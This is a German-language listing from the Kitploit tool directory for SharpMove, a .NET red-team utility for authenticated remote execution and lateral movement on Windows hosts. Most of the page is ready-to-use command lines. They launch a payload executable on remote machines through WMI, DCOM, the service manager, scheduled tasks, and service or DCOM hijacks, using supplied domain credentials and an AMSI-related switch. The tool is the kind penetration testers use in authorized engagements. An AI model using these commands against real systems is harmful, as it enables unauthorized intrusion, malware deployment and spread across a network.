Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpMove — .NET-Projekt zur Durchführung authentifizierter Remotausführung | Kitploit
Tools/GitHubGitHub/0xthirteen/sharpmove
Laterale BewegungPost-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHub0xthirteen/sharpmove

SharpMove

.NET-Projekt zur Durchführung authentifizierter Remotausführung

Repository anzeigen
41070vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpMove - .NET authentifizierte Ausführung auf entfernten Hosts

Kompilieren

Zum Kompilieren öffnen Sie das Visual Studio-Projekt und kompilieren Sie es für die Veröffentlichung.

Optionen

  • WMI
  • SCM
  • DCOM (Mehrere)
  • Taskplaner
  • Dienst-DLL-Hijack
  • DCOM-Server-Hijack
  • Geplanten Task ändern
  • Dienst-Binärpfad ändern
root@kitploit:~
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
root@kitploit:~
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
root@kitploit:~
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
root@kitploit:~
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
root@kitploit:~
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
root@kitploit:~
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
root@kitploit:~
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
root@kitploit:~
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

Teil von MoveKit

Tool herunterladen